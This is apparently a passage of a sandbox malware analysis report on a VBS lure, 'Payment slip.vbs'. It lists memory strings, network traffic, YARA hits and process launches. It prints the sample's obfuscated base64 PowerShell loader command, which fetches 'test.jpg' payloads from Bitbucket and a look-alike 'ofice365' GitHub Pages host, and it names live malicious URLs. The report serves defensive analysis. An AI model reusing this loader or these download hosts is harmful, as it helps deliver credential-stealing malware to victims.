                Source: powershell.exe, 00000002.00000002.1926563968.000001C02E8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1926563968.000001C02E934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/15038381-db7c-497a-b239-00417b221e97/downloads/4d6f306b-216d-
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                Source: powershell.exe, 00000002.00000002.1926563968.000001C02EE6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594867297.000001BE20210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE1FF90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594908002.000001BE20245000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE1FFA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
                Source: powershell.exe, 00000002.00000002.1926563968.000001C02EE6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594867297.000001BE20210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE1FF90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594908002.000001BE20245000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE1FFA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io/1/test.jpg
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacl
                Source: RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1658637040.0000000009C48000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1658637040.00000000088C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.123.233:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49709 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: powershell.exe PID: 976, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6164, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Sample has a suspicious name (potential lure to open the executable)
                Source: Payment slip.vbsStatic file information: Suspicious name
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_016611086_2_01661108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_016611186_2_01661118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05862B686_2_05862B68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05862B496_2_05862B49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E94F86_2_059E94F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E9C216_2_059E9C21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E48F86_2_059E48F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E8D506_2_059E8D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E8D606_2_059E8D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E94E86_2_059E94E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E96446_2_059E9644
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E48E96_2_059E48E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059ED30E6_2_059ED30E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05A805586_2_05A80558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05A816006_2_05A81600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05A8088F6_2_05A8088F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA66806_2_05AA6680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA2E7C6_2_05AA2E7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA6B906_2_05AA6B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA8BE06_2_05AA8BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA66806_2_05AA6680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA66706_2_05AA6670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA11786_2_05AA1178
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA6B816_2_05AA6B81
